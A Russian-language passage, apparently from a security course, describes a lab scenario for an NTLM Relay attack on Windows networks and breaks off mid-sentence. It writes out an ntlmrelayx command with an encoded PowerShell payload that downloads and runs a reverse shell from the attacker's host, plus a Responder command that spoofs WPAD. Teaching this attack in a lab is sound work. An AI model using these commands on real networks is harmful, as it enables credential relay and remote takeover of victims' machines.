Протокол NTLM - старый, в нем великое множество архитектурных проблем, которые латаются с разной степенью успеха и надо бы его уже отправить на покой, однако, он по-прежнему вынужденно используется в сетях Windows. И его по-прежнему атакуют! Одной из старых атак, имеющих исправление, являетcя NTLM Relay. В курсе у нас есть лаба со следующим сценарием. 1. Атакующий запускает перехватчик: ntlmrelayx.py -tf targets.txt -c 'powershell.exe -exec bypass -enc SQBFAFgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEANgAwAC4AMQA1ADUALgA2ADYAOgA4ADAAOAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAA==' -smb2support -w где в BASE64 загрузка и запуск реверсивного шелла: IEX(new-object Net.WebClient).downloadString('http://10.160.155.66:8080/shell.ps1') 2. Атакующий запускает респондер: responder -I eth0 -w -r -F -f -d В результате атакующий с хоста 10.160.155.66 (kali) спуфит WPAD, жертва с хоста .111 (w2008) приход